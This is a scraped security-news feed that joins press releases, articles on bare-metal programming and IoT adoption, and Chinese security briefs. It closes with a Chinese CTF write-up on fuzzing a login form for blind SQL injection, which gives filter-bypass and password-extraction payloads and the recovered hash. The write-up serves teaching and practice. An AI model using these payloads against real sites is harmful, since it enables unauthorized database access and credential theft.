Have questions? Leave a comment below, or follow Thales eSecurity on Twitter , LinkedIn and Facebook.

The post Perspectives on the ‘Paris Call’ appeared first on Data Security Blog | Thales eSecurity .

Axiado’s Processor Architecture Without Meltdown & Spectre Vulnerabilitie ...

$
0
0

SAN JOSE, Calif. (BUSINESS WIRE) #Firewall Axiado today announces a deterministic in-order protocol for its

firewall processor architecture, delivering high performance without

compromising security.


Axiado’s Processor Architecture Without Meltdown & Spectre Vulnerabilitie ...

Current high-performance processor architectures use out-of-order

processing, exposing digital systems to critical hardware

vulnerabilities like Meltdown and Spectre. After-the-fact patches to

those vulnerabilities significantly diminish processor performance.

Axiado’s firewall processor architecture does not have a performance

downside from in-order processing due to its efficiencies of intercore-

and interprocessor-communication.

Out-of-order processing was introduced in the late 1990s as a response

to market expectations of continuous performance enhancement. While

offering a potential performance gain of up to 15 percent, out-of-order

processing and related predictive execution (speculative branching,

speculative caching, and cache dumping by OS debugger) left systems

vulnerable to cyberattacks.

“In totality, our processor outperforms existing processors that use

out-of-order protocol because our OS makes a better use of all cores and

accelerators that take care of most computationally intensive programs

and subroutines,” said Axel Kloth, founder and CTO of Axiado.

According to John Gustafson, inventor of Gustafson’s Law of Parallel

Speed-Up, former Director of Research at Intel Labs, and Senior Fellow

of AMD, “A lot of companies have discovered that things like

out-of-order execution, and all these other tricks that processor

companies have done to improve performance, are full of holes and allow

people to penetrate and abuse the systems.” Attempts to remedy these

vulnerabilities by software patching diminishes processor performance,

resulting in incomplete security and zero gain in processor performance.

Nick Tredennick, developer of Motorola’s MC68000, AMD’s Nx686, and IBM’s

Micro/370 processors affirmed, “Out-of-order execution within the

current CPUs requires speculative execution, speculative branching, and

speculative caching. These caching and aging algorithms are very complex

and highly prone to error, causing high latency for cleanups. An

in-order processor does not have this challenge, and the remaining issue

of per-core performance can be mitigated using other methods.”

“The most valuable thing that a company can do is to protect individuals

and make sure that their sensitive information is not exposed on the

internet,” said Ashok Babbar, CEO of Axiado. “Our response to the need

for uncompromised security is a processor architecture that employs

in-order processing that is immune to the vulnerabilities of all other

processors today without giving up high performance. Our processor

architecture has been specifically designed to protect itself and other

processors from known and unknown cyberattacks at the first point of

intrusion. We believe this technology is invaluable to network systems

companies who want to deliver impenetrable firewalls with high

performance to their customers.”

See more about Axiado’s high-performance in-order processing at https://axiado.com/hpiop/

About Axiado

Axiado is a firewall processor company securing the digital

infrastructure At the 1 st Point of Intrusion TM . By

architecting both the computational and networking stacks, the company

has developed the most advanced security platform from the ground up.

Axiado’s security platform, comprising a secure microprocessor,

firmware, OS kernel and APIs, is free from the attack surfaces that

other processors and operating systems exhibit today.

Press kit available at https://axiado.com/press/

Discover more at https://axiado.com

and follow us on Twitter at security@axiado.corp .

Axiado TM and the Axiado logo are trademarks of Axiado

Corporation.

Contacts

Minna Holopainen, VP Communication

Axiado Corporation

minna.holopainen@axiado.com
Axiado’s Processor Architecture Without Meltdown & Spectre Vulnerabilitie ...
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

Bare Metal Programming

$
0
0

As the need for safety and security grows across application areas such as automotive, industrial, and in the cloud, the semiconductor industry is searching for the best ways to protect these systems. The big question is whether it is better to build security and safety into hardware, into software, or both.

In the early days of embedded systems development, software was rather minimal, and often something of an afterthought, said Colin Walls, embedded software technologist at Mentor, a Siemens Business . “Commonly, it was developed by the same engineer(s) who had designed the hardware, and naturally their code interacted very closely with the electronics. They understood all the nuances of the hardware’s behavior, so it was not seen as a particular challenge.”

As systems became more sophisticated, software specialists began to get involved. These specialists tended to be engineers with a significant knowledge and understanding of hardware, so they were quite happy programming close to the hardware. But rising complexity has made this much more difficult.

“As complexity increased, the single software engineer became a team,” Walls said. “Different team members would have different types of expertise. Those with good hardware knowledge would encapsulate that expertise in software modules, which provided a clean interface and concealed the complexity of hardware interaction. These modules were termed drivers.”

With increasingly powerful microprocessors/microcontrollers and larger memories, the need for a rational program structure drove the adoption of real-time operating systems (RTOSes) that enabled the use of a multi-tasking model. It was a natural progression for the drivers to become part of the RTOS.


Bare Metal Programming

Fig. 1: Software stack. Source: Mentor

Bare metal software

When developing an embedded system, an early decision to make is whether to employ an RTOS or not. Many engineers give this very little thought because they are used to coding on top of an operating system. An RTOS is code written on bare metal, and it’s an important choice for design teams.

The simplest structure for an embedded application is an infinite loop―do something, do something else, do something else, then repeat.

“This simplicity has real value, as the behavior of the code is quite predictable,” Walls said. “The issue is that each part of the code is dependent on other parts of the code for its opportunity to run. This becomes a problem if the code is modified/updated and the equilibrium thus disturbed. The code structure does not scale. The (perhaps obvious) way to restructure the software to reduce the interdependency is to unload some of the hardware responsive code into interrupt service routines (ISRs). The ISRs should be small and fast, primarily concerned with queueing up work to be done in the main loop. This structure is more scalable, but still ultimately depends on all the application code being ‘well behaved.'”

Here, the most flexible and scalable program structure is a multi-tasking (multi-threading) model, where each piece of software functionality is coded as an independent program that is allocated CPU time by a scheduler (see Fig. 2). That, in turn, is part of an RTOS.


Bare Metal Programming

Fig. 2: Multi-tasking model. Source: Mentor

Increasingly, there is interest in creating SoC monitoring systems that simply ignore things like run control, which is the classic debug of software running on a processor. Instead, they non-intrusively observe a system in real time, without affecting the behavior of the system. Working at the bare metal layer, i.e., exclusive of the operating system, can be an option.

Programming challenges and options

Although the largest proportion of modern embedded software designs are implemented utilizing an OS of some kind, there are a couple of circumstances when doing without―programming on bare metal―may be a reasonable decision. This could include situations where the application is extremely simple and is implemented, perhaps, on a low-end processor. It also could include situations where there is a need to extract every last cycle of CPU power for the application, and the overhead introduced by an OS is unacceptable.

In both cases, thought must be given to possible future enhancements to the software. If further development is likely, starting out with a scalable program structure is a worthwhile investment, Walls said.

There seems to be growing interest in this approach. While programming on bare metal is not mainstream today, a number of companies are kicking the tires for in-life analytics, said Gajinder Panesar, CTO ofUltraSoC. The goal is to observe and detect anomalies while a system is running, which is essential in autonomous vehicles if the anomaly can cause a safety-related malfunction.

“There are people moving toward that, to be able to use the metrics or the rich data that bare metal monitors generate, and they want to chew that data and then decide if that’s anomalous or not,” Panesar said. “The next step would be to take that data and say, ‘Ah, this is why it happened. It was because somebody did this seconds earlier, or nanoseconds earlier.’ It’s primarily the safety and high integrity systems, where it will be used for things like making sure the system is performing and functioning as well as expected, and then to make sure the system is continuously behaving.”

This can be extremely useful in bothsafety andsecurity applications. “Simple cases could be the observation of how a set of things within the system are playing―the orchestration of software and hardware and how that’s going,” he said. “You can look at this by stepping back a bit and saying, ‘The way the system behaves is that this set of things must talk to this other set of things, and there should be this interaction.’ If this pattern or tune changes slightly or is off pitch, we can detect that. So we can detect things that should happen but haven’t happened, or things that have happened that shouldn’t happen. Also, we can watch when things start drifting. If you think about it as a tune or a regular set of things, when there’s a blip or when the tune changes, the words are still the same but the tune is different. One example is a stuck pixel for the automotive app, where by observing what’s happening in theSoC and the communication between things like a camera input and the memory, we can make a judgment call about whether that camera has got some stuck pixels or not.”

This can be done purely in software, but it would require software running in the stack to detect this. The big concern there is latency and the time it takes to detect an anomaly, and software closer to the metal reacts more quickly than software way up in the stack.

“Interestingly, you don’t necessarily know what you’re looking for to begin with,” Panesar said. “You realize that this SoC is going to go into, say, the engine management of a car, and you know the set of accesses or sequences of transactions that should take place, and off you go. But then you realize that it’s actually connected to something like aCAN bus or automotive Ethernet, so it hasn’t got an interface. And by the way, the other end of the Ethernet there is a user console for infotainment, and why is it accessing the engine management system? Is that sensible? So at runtime, you actually can make sure that only these communications can access any part of the SoC. You can incrementally build this without re-spinning the SoC, without having to change the application software running.”

Market drivers

In the automotive world, standards such asISO 26262 are the gatekeepers. If you don’t follow those standards, you can’t sell your chip into a specific system.

“That’s really where the need for bare metal programming in automotive is coming from today,” said Frank Schirrmeister, senior group director for product management and marketing for emulation, FPGA-based prototyping and hardware/software enablement atCadence. “It stems from the failure rates you see for certain components in the system. If you look into the car, there are certain rates for how often things are allowed to fail. That trickles down into the components underneath―how often they are allowed to fail. And then it’s all about the multiplication of the different probabilities. The problem is the more you multiply, the bigger the probability that one of them fails.”

Many engineering teams look at the safety-related aspects at the chip level where they examine whether the system will still behave safely if this bit is stuck at a certain level.

“In that context, we also are checking for items that involve the software at that level,” Schirrmeister said. “And then it’s really bare metal. This is the first layer of contact to the functional safety in the chip through an extension offault simulation tools, which test to see what the system will do if a certain node is stuck at zero or stuck at one. So in the automotive case, it’s all about the ISO 26262-type definitions. Software plays a role in that it runs on a processor at the bare metal level. Then you will want to figure out if the system will go back into a safe state. The main problem there becomes the planning of the fault campaigns, which are the things you really want to test, because you want to test if this particular part of my chip fails, will my system go into the safe state or not?”

And while this needs to be accounted for at the architectural level or very early in the design process, there are also some of the mechanisms to allow the system to falls back into a safe state. Those are implemented a bit lower down.

“For a software system, you want it to not just crash,” Schirrmeister said. “You want it to get into a safe state, and that’s where the bare metal layer of software may be helpful to basically identify, ‘What happens if this routine fails? Or if the hardware fails at this point I’ll trap into an interrupt routine or what have you.’ And that needs to get the system into a safe, predictable state.”

Safety risks and benefits

While the benefits to visibility at the bare metal level is clear, there are valid concerns about providing different levels of access to a chip. Some industry experts wonder if vulnerabilities may be introduced along the way.

This is one area where formal verification can play a vital role, because it can identify potential problems across a complex system that may not be obvious.

“You are looking at the unknown use cases, and most of functional verification is built with use cases,” Sergio Marchese, technical marketing manager atOneSpin Solutions. “I once found a bug in an Arm core. The instruction was being marked as valid, when it was not. The designer who is, of course, very, very busy tells me this is a crazy scenario that is not going to happen. ‘This is not the recommended use case. It’s not something that a normal human being would use, so it’s safe. I don’t have time to deal with this. I need to fix bugs that are gonna mess up my use cases.’ But when it comes to security, let’s say this kind of bug leaks. It could potentially lead to a vulnerability, because that’s exactly what an adversary is looking for. The adversary is looking not for normal use cases. It’s looking for funny things that can compromise the security of the chip. So that’s one aspect of it security. Then I think in terms of problems, and there are two categories. One is security itself, which means, ‘Let’s say, we’ll never build this through genuine mistakes, so to speak, or mistakes that can be at the architecture level, at the implementation level, functional bugs, whatever.’ And then there are vulnerabilities perhaps due to malicious mistakes.”

Panesar stressed the intention is not to replace conventional security methods. Rather, it is to augment those methods. “The likes of public key encryption, etc., that should all be in place,” he said. “In a typical example, maybe an SoC has been hacked somehow, and someone’s managed to download some crypto mining software. How do you detect that? You can detect this by anomalous CPU loading. You can detect this by knowing or observing. There are a number of ways you can observe CPU utilization, even during idle periods when there’s no activity. Even when a car isn’t moving, this information can be transmitted over a secure channel, maybe an SSH channel, to some supervisor system.”

This approach also works for identifying ramsomware. “You have to detect this anomalous activity when the system is potentially idle and get that across to people,” he said. “This data is sent periodically in systems that are always connected. The automotive industry will be doing vehicle-to-vehicle communication, and they’ll always be connected just to make sure that the car hasn’t suddenly broken down and they’ve not heard anything. So this can exploit that connection. You can be periodically sending some sort of heartbeat. And from that you can see all of a sudden a CPU has gone to 90% loading, when actually it’s stuck in a car park.”

Conclusion

Clearly, there is work yet to be done, and solutions are still evolving―especially in security.

“This area still is much less established,” Marchese said, “How do you trade off the security architecture, so to speak, with power, with area, with complexity, with the extra design and engineering work? Safety, in a sense, is easier because you have a visible adversary. You model your random faults to say, ‘I want to see these types of faults in this type of logic.’ You can quantify it. It’s rather hard work, but at least you know exactly what kind of adversary you are defending against. With security, that’s not the case. You have some known facts, but ultimately the tricky things you don’t know about are the things you want to defend against, so everything becomes more complicated. Even when you add new logic, you need to be careful not to add new vulnerability because with security, things are pretty crazy.”

Bare metal programming may be the ultimate compromise between hardware and software, but it requires a deep understanding of both at the very outset of the design process. So while there are clear benefits, this stuff isn’t easy.

【每日资讯】泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款

$
0
0

摘要: 泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款 美国联邦贸易委员会(FTC)本日同意与一儿童电子玩具制造商达成和解协议。而实际上该公司伟易达收集了数百万儿童用户数据,却未能做好数据保护工作。 参考来源: theregister windows...

泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款
【每日资讯】泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款

美国联邦贸易委员会(FTC)本日同意与一儿童电子玩具制造商达成和解协议。而实际上该公司伟易达收集了数百万儿童用户数据,却未能做好数据保护工作。

参考来源:

theregister

Windows 7 装 CPU漏洞补丁后出现蓝屏 安全模式也进不了
【每日资讯】泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款

近日又有消息称微软面向Windows 7系统发布的KB4056894存在升级失败问题,导致错误代号为0x000000c4的蓝屏情况。目前尝试过多种常规修复方案均没有奏效,唯一解决方案就是移除该补丁并选择忽略直到微软官方正式修复为止。

参考来源:

cnbeta

苹果针对 Spectre CPU 发布安全更新
【每日资讯】泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款

苹果发布了安全更新,以减轻影响与苹果设备上的Spectre处理器漏洞的影响,目前设备包括macOS High Sierra 10.13.2, iOS 11.2.2, 和Safari 11.0.2。

参考来源:

bleepingcomputer

趋势科技:在Google Play上发现36个伪装成安全工具的恶意软件
【每日资讯】泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款

趋势科技的研究人员在GooglePlay上发现了36个恶意应用程序,而这些应用程序伪装成了大公司的安全工具。本月,Google再次进行了应用程序的安全检查,而趋势科技的研究人员在Google Play上发现了36个装成安全工具的恶意应用程序,诸如安全卫士,安全守卫,智能安全,高级升级应用等。

参考来源:

securityaffairs

黑莓手机网站感染了Coinhive加密货币挖矿脚本

近日有用户报告表示,黑莓手机网站感染了Coinhive加密货币挖矿脚本,脚本访客的CPU处理能力挖掘虚拟货币门罗币。一位Reddit用户在网站上发现了代码并公开 他们注意到只有TCL通信技术控股公司所拥有的www.blackberrymobile.com网站受到影响。

参考来源:

infosecurity-magazine

AMD 彻底躺枪:微软 KB4056892 补丁或导致系统变砖
【每日资讯】泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款

据外媒 1 月 8 日报道, 微软为 Meltdown 、 Spectre 发布的安全更新 Windows KB4056892 对一些 AMD 设备的系统(尤其老款 AMD Athlon 64)产生了负面影响。

参考来源:

hackernews

新型 CoffeeMiner 攻击:劫持公共 Wi-Fi 用户设备秘密挖掘门罗币
【每日资讯】泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款

据外媒 1 月 6 日报道,开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目,展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。

参考来源:

hackernews

本文资讯内容来源于互联网,版权归作者所有,如有侵权,请留言告知,我们将尽快处理。

更多


【每日资讯】泄露数百万儿童数据,玩具制造商伟易达被FTC处以65万美元罚款

工信部:三季度受理涉嫌通讯信息诈骗用户举报1.4万余件次

$
0
0

【TechWeb】11月29日消息,据工信部方面公布的数据显示,三季度,监测处置恶意网络资源、恶意程序、安全漏洞等网络安全威胁约3397万个,其中WannaCry、Globelmposter等多种勒索病毒活跃,WannaCry勒索病毒感染的设备每天仍高达6000至14000台。


工信部:三季度受理涉嫌通讯信息诈骗用户举报1.4万余件次

数据称,三季度,监测发现新增工业控制、智能设备、物联网等相关漏洞105个。持续监测的重点工业互联网平台中,发现疑似风险2600余个;联网工控系统发现45个漏洞,涉及多个品牌共计58个产品。

受理涉嫌通讯信息诈骗用户举报1.4万余件次,环比下降4.9%。国际来源诈骗电话194万余次,环比下降3.4%。“机票改签”、“银行卡冻结”、“购物网站客服”等成为主要诈骗手法。

同时,三季度,共抽查40家移动通信转售企业5082.8万余条电话用户登记信息,总体准确率为98.2%。随机抽查2017年以后新入网用户12.8万余张现场留存照片,用户人证一致率为95.4%。

工信部提醒称,广大用户要提高通讯信息诈骗风险防范意识,通过正规渠道办理电信业务,并且要做好勒索病毒风险防范,及时采取更新安全补丁、关闭计算机不必要开放的端口、定期备份重要文件等防护措施。

7 Novice Mistakes to Avoid When Adopting Smart Devices for Your Company

$
0
0

Opinions expressed by Entrepreneur contributors are their own.

It typically takes careful planning and execution to be successful when adopting any new technology. Internet-of-Things (IoT) devices are no different. The problem is that some of us typically get too enamored with the technology. We often fail to take into account the realities that our respective companies face.

Hopping on to the IoT bandwagon without planning is a recipe for disaster. A study by Cisco revealed that only 26 percent of surveyed companies were successful with their IoT initiatives.Whether it is updating firmware, security vulnerabilities or simply not taking user experience into account, it is critical for companies to avoid common stupid mistakes when adopting IoT.

Here are seven common pitfalls you should avoid now that IoT devices have infiltrated your office.

1. Don't be cheap.

The market is now flooded with cheap IoT devices. On the upside, these low-cost devices lower the barriers to adoption. On the downside, they can also be security risks. These devices typically have few security features and minimal active support. These leave them vulnerable to malware and expose infrastructures to cyberattacks in case potential exploits are found in their software, which means that companies need to implement additional solutions in order to maintain control.

“In IoT initiatives, organizations often don't have control over the source and nature of the software and hardware being utilized by smart connected devices,” notes Ruggero Contu , a research director at Gartner. “We expect to see demand for tools and services aimed at improving discovery and asset management, software and hardware security assessment, and penetration testing.”

These solutions can be costly, mind you, which is why Gartner predicts spending on IoT security to reach $3.1 billion in the next three years. Make sure you invest in devices that have essential security features such as user authentication, data protection, and upgradable firmware. Get devices from companies that have active support and development for their products. Take time to identify vendors that could provide you with longer-term support that cover the lifespan of the devices.

Related:25 InnovativeIoTCompanies and Products You Need to Know

2. Overlooking alignment with business goals.

You have to know why you’re starting an IoT project. What business goals do you intend to meet? Do you intend to reduce costs, gather more data, or automate processes? Knowing this would make it easier for you to match appropriate IoT solutions for what you seek to improve.

Having a goal in mind also lets you avoid the trap of novelty. Are you installing Nest thermostats because it’s the cool thing to do or are you really keen on reducing energy costs? Just because everyone else is installing these devices doesn’t mean that you should also rush to do the same.

Try to determine how these devices enhance your ability to deliver value to your internal and external customers. Your strategy should also consider extracting as much value from the effort. For example, the data from IoT devices should fuel business intelligence efforts.

3. Overlooking the ongoing need for maintenance.

Each device you integrate with your network is an additional endpoint that needs to be managed and secured. By adopting IoT at your company, you’re likely to see a spike in the number of devices connected to your network.

“As our ownership of smart technology expands, there will become a moment in time when you will no longer have the instant knowledge of the devices in your home or office which could be used to expose critical vulnerabilities, breach your network or steal your identity,” notes Robert Brown , Cloud Management Suite’s director of services.

Bring-your-own-device (BYOD) policies are now the standard for many organizations. These typically increase staff productivity by ensuring that they are connected and productive wherever they are. However, you must anticipate the addition of these devices to your infrastructure and consider them in your strategy.

Evaluate how well-equipped your IT team is to manage additional devices. Invest in the proper tools and technologies that would help them be more efficient in maintaining your infrastructure.

Related:3 Biggest Cybersecurity Threats Facing Small Businesses Right Now

4. Ignoring security warnings.

Many IoT devices claim to be user-friendly but sometimes this simplicity contributes to vulnerabilities. Many devices are left exposed to attacks just because users haven’t bothered properly configuring them.

Check if you’ve done basic security checks like changing the default access to administration panels of devices. Most malware bots target devices that are left using default usernames and passwords . Are your devices running on the most up-to-date firmware and software? Patches must also be regularly deployed to ensure that recently-addressed vulnerabilities and bugs are fixed.

Staff members’ own devices are also potential security weak points. Make sure you have measures and protocols that ensure that your data and network are secure especially when accessed through these devices.

5. No contingencies.

IoT devices rely on connectivity to function. But what happens when the Wi-Fi or the internet goes out? If you rely on being online all the time, then you’re inviting trouble. Check if your devices have the options to function offline and temporarily store data locally before resyncing to the cloud at a later time. This way, you will still be able to function without any loss of productivity and data even if you lose internet.

“Despite all the advancements in technology, database, hardware, and software downtime are an expected aspect of doing business,” notes Matt Woodward , who serves as VP Digital Transformation at Rand Group. “The only way to mitigate the risk is to prepare and have the right technology in place to monitor, restoreand restart.”

In addition, you may also want to implement redundancies, backupsand failover measures. Cloud backup solutions help not only to prevent data loss but for businesses to recover and become operational quickly in the event of downtime. Downtime is costly to any enterprise. If you’re not prepared to invest in these measures at the moment, then reconsider embarking on IoT altogether.

Related:ThisCloud-Based Data Service Makes theIoTLess WTF

6. Forcing technology on people.

Success of IoT projects also relies on how well staff can use the technology to achieve results. However, new technologies sometimes get forced on them. It’s important to have people of all levels buy into the effort.

Educate your staff about how these new devices and measures will make them more productive. They must also be involved, or at least consulted, so that you’d be able to create an engaging working environment that truly delivers value for everyone.

Users must also be educated on how to use

Instart Logic Is Now Instart

$
0
0
Rebranding Reflects Corporate Vision for Making Digital Properties
Faster, More Appealing and Profitable PALO ALTO, Calif. (BUSINESS WIRE)

Instart

, the company helping thousands of leading brands around the

world deliver a faster, safer and more profitable digital experience,

today announced that it has officially changed its name to Instart. More

identifiable and easier to remember, the company’s new name “Instart” is

short for Instant Start, and the rebranding initiative is reflective of

the company’s ongoing commitment to making digital properties as fast,

visually appealing and profitable as possible. Instart’s new URL will be https://www.instart.com .


Instart Logic Is Now Instart

Thousands of global brands, retailers and media and publishing firms

from around the world including Edmunds, Hearst, Neiman Marcus and

Office Depot use the Instart Digital Experience Cloud (DX Cloud) to

increase performance, reliability, security and customer satisfaction

without requiring any changes to their digital applications or

infrastructure. Instart provides secure, high-performance and consistent

digital experiences to end users while at the same time helping global

brands improve conversion by up to 30 percent, online retailers drive

increased sales of up to 10 percent and offering media and publishing

firms the ability to boost their advertising revenues by as much as 20

percent.

“Our new name is all about the company’s charter, focus and

forward-looking vision,” commented Instart Chief Marketing Officer

Daniel Druker. “Our passion is helping our clients deliver amazing

digital experience to their customers, which result in improved

operations, higher revenue and greater profit for them. The Instart DX

Cloud is the fastest, easiest and highest ROI way for digital centric

companies to improve the performance, reliability and security of their

digital applications. Our new name makes sense because we truly deliver

the ‘Instant Start’ on the Internet that consumers crave and that

digital businesses need to maintain their competitive edge.”

About the Instart DX Cloud

Instart’s global, cloud-based platform connects customers’ cloud, web

and mobile applications with consumers’ devices and automatically and

dramatically improves performance, consumer experience and security,

leading to higher engagement, conversion, revenue and lifetime value.

About Instart

Instart helps thousands of leading brands around the world deliver a

faster, safer and more profitable customer experience through its

revolutionary digital experience cloud. Instart combines machine

learning, application and device awareness, and open APIs with a broad

suite of integrated and automated cloud services, including web and

mobile application performance optimization, image optimization, digital

advertising optimization, tag analytics and control, web application

security, DDOS protection, bot management and security, and content

delivery. Using Instart, enterprises can provide ultra-fast, visually

immersive, amazingly engaging and highly secure experiences on any

device to maximize revenue, deliver superior customer experience, and

gain competitive advantage. Learn more at https://www.instart.com .

Contacts

Bospar

Ruben Ramirez, 917-699-9083

ruben@bospar.com
Instart Logic Is Now Instart
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

48小时内劫持3亿次浏览器会话的iOS恶意攻击

$
0
0

本月,一场针对iOS设备的大规模恶意攻击活动在短短48小时内劫持了多达3亿次的浏览器会话。Confiant的研究人员于11月12日观察到了此次攻击,并在对其跟踪后表示此项活动背后的威胁行为者至今仍然活跃。

恶意页面

据研究人员称,恶意广告背后的威胁行为者通常会将恶意代码注入合法的在线广告和网页,当受害者点击这些网页时,会被强制重定向到恶意网页――最常见的就是成人内容或是礼品卡诈骗网站。这些登录页面通常模仿谷歌Play应用程序,使其看上去更合法。接着就会开始诱导访问者给出自己的信息,如电子邮件,地址,收入信息,购买意图,等等,以实施联盟营销相关的欺诈或窃取个人身份数据。


48小时内劫持3亿次浏览器会话的iOS恶意攻击

Confiant首席技术官Jerome Dangu表示:

在没有用户交互的情况下网页会话就能被劫持。当用户看到自己有机会赢得1000美元时,就会有一些人上当受骗。考虑到波及范围之广,哪怕用户上当的概率很小,对攻击者而言也是非常有利可图的。

更大的规模

恶意广告活动并不少见。早在今年7月,在线广告公司AdsTerra就被攻击者利用,在超过1万个被入侵网站上展开恶意营销活动。而最近的这起攻击主要针对的是美国的iOS用户,因其规模之大而备受瞩目。

虽然Confiant已阻止了500多万次点击,但该公司估算,在48小时内,向用户投放的总展示次数已超过3亿次。而在2017年,由威胁行为者Zirconium发起的最大规模的恶意广告活动在去年整整一年里也仅仅劫持了10亿次会话。


48小时内劫持3亿次浏览器会话的iOS恶意攻击

Dangu表示:

近60%的Confiant客户受到了此次攻击的影响。如果对3亿受影响的浏览器会话保守估计0.1%转换率,也意味着至少有30万受害者。每个受害者对攻击者来说都值好几美元。遥测数据显示,攻击者花费了大概20万美元来开展这一活动。我们猜测,攻击者在两天内就赚到了100万美元。

攻击背后

Dangu表示,他们已知的、执行此类攻击的组织就有几十个,但当前还没有办法判定究竟是谁所为。从今年8月份开始,Confiant就注意到了该攻击者的动向,但当时其攻击范围还很小,因此对其也未能有更进一步的了解。


48小时内劫持3亿次浏览器会话的iOS恶意攻击

研究人员观察到,攻击者的目标不光在美国,也在澳大利亚新西兰等地。并且,该行为者当前仍然活跃,一直在不断的调整广告的分发。预计在未来一段时间,他都将继续利用程序化广告平台来维持运营。

SQL注入常规Fuzz全记录

$
0
0
前言

本篇文章是在做ctf bugku的一道sql 盲注的题(题目地址: 注入题目 )中运用了fuzz的思路,完整记录整个fuzz的过程,给师傅们当点心,方便大家加深对web sql注入 fuzz的理解。


SQL注入常规Fuzz全记录
进入主题

1.访问题目,是个典型的登录框


SQL注入常规Fuzz全记录
2.尝试输入admin/123456,提示密码错误,因此可以确定存在用户admin,这里可能会有师傅要爆破了,但这里题目要求sql注入,我们就按照预期解来吧。
SQL注入常规Fuzz全记录
3.我自己写了个简单的fuzz burp插件,先将登陆请求包发送到插件扫描,可以看到是存在盲注的,payload的形式为:
SQL注入常规Fuzz全记录

4.fuzz

(1)从payload的形式可以猜测题目应该是过滤了注释符( +和#)

(2)fuzz一遍特殊字符,看看过滤了什么

当存在过滤的字符时,响应包是这样的


SQL注入常规Fuzz全记录

因此可以作为fuzz的判断(当然有些waf是静默waf,就是照样接收你的数据但自己做了处理,返回正常页面,这种fuzz的判断有时候就需要设计下你的payload,这种在以后的文章继续讨论)

fuzz特殊字符,结果如下,可以看到长度为370的是被wa了的,过滤了相当多的字符,特别是内联注释 注释符 空格 %0a %0b %0d %a0这些比较常用的绕过关键组件,尤其注意过滤了逗号


SQL注入常规Fuzz全记录

(3)fuzz一遍关键字,过滤了and or order union for 等等,因此取数据常用的mid( xx from xx for xx)就不能用了,之前逗号也被过滤了也就不能用mid(xx,1,1)。


SQL注入常规Fuzz全记录
(4)fuzz函数名和操作符(由于插件的扫描结果没有过滤sleep,直觉上是没有对函数做过滤)
SQL注入常规Fuzz全记录
SQL注入常规Fuzz全记录

不出意外,确实是只有包含关键字or and等的函数被wa了,其他基本没有,其实这里我们也可以联想到跑表经常要用的information_schema表是存在or关键字的,因此后面构造语句的时候也就不能直接用information_schema

(5)尝试用时间盲注跑数据

if(1=1,sleep(5),0)

由于不能用逗号需要变为

CASE WHEN (1=1) THEN (sleep(5)) ELSE (2) END

但空格也被过滤了,需要用括号代替空格(/*!*/ 空格 tab %a0 %0d%0a均被过滤了)

(CASE WHEN(1=1)THEN(sleep(1))ELSE(1)END);

最后本地测试的时候发现case when之间不能用括号,做一下字符fuzz,从%00到%ff


SQL注入常规Fuzz全记录
可以看到结果是确实不行,并不能产生延时(有的直接被wa,有的没被wa但sql语句无法生效),因此基本可以确认不能用时间盲注跑数据,于是我们只能考虑布尔盲注

(6)尝试布尔盲注

由于无法使用if或者case/when,只能使用题目自带的bool盲注做逻辑判断(=) 比如我们一开始就注意到存在admin用户,改造插件的payload: ‘+sleep(5)+’ (注意把+换为%2b)

admin'+1+' (false,注意把+换为%2b)
admin'+0+' (true,注意把+换为%2b) select * from user where name='admin'+1+'' and passwd='123456';(为false) ==>提示用户名错误
select * from user where name='admin'+0+'' and passwd='123456';(为true) ==>提示密码错误

这里是mysql的一个特性,可能有不明白的师傅,可以做下实验

select 'admin'='admin'+0 union select 'admin'='admin'+1;

前者为1后者为0,先对右边的等式做运算,发生强制转换,结果为数字,然后再和左边的admin字符做比较,又发生了强制转换,因此出现1和0的区别。

这样子我们就解决了布尔盲注的判断了

(7)解决下跑数据的问题

这里不能用mid(xxx,1,1)也不能用mid(xxx from 1 for 1),但查手册发现可以使用mid(xxx from 1),表示从第一位开始取剩下的所有字符,取ascii函数的时候会发生截断,因此利用ascii(mid(xxx from 1))可以取第一位的ascii码,ascii(mid(xxx from 2))可以取第二位的ascii,依次类推


SQL注入常规Fuzz全记录

(8)burp跑数据

a.判断passwd字段的长度: 跑出长度为32

(这里可以猜字段,根据post请求包中的passwd猜测数据库的字段应该也是passwd,这样就可以不用去跑information_schema,直接在登陆查询语句中获取passwd)

admin'-(length(passwd)=48)-'
SQL注入常规Fuzz全记录

b.跑第一位

这里的payload我用的不是上面的,从最后面开始倒着取数据然后再reverse一下,那时候做题没转过弯,其实都一样的,用下面的payload的好处是假如ascii不支持截断的情况下是不会报错的(用于其他数据库的时候)

=admin'-(ascii(mid(REVERSE(MID((passwd)from(-1)))from(-1)))=48)-'

用这一个也可以的

=admin'-(ascii(mid(passwd)from(1))=48)-'
SQL注入常规Fuzz全记录

重复上述操作修改偏移,即可获取32位密码005b81fd960f61505237dbb7a3202910解码得到admin123,登陆即可获取flag,到这里解题过程结束。

总结

1.上述用到的fuzz字典均可在sqlmap的字典以及mysql官方手册中收集

2.这里仅仅是常规的fuzz,但大多数fuzz其实都是相通的,主要是fuzz的判断,fuzz的位置,fuzz payload的构造技巧等等

3.欢迎各位大师傅一起交流讨论!

*本文作者:Conan,转载请注明来自CodeSec.Net

Viewing all 12749 articles
Browse latest View live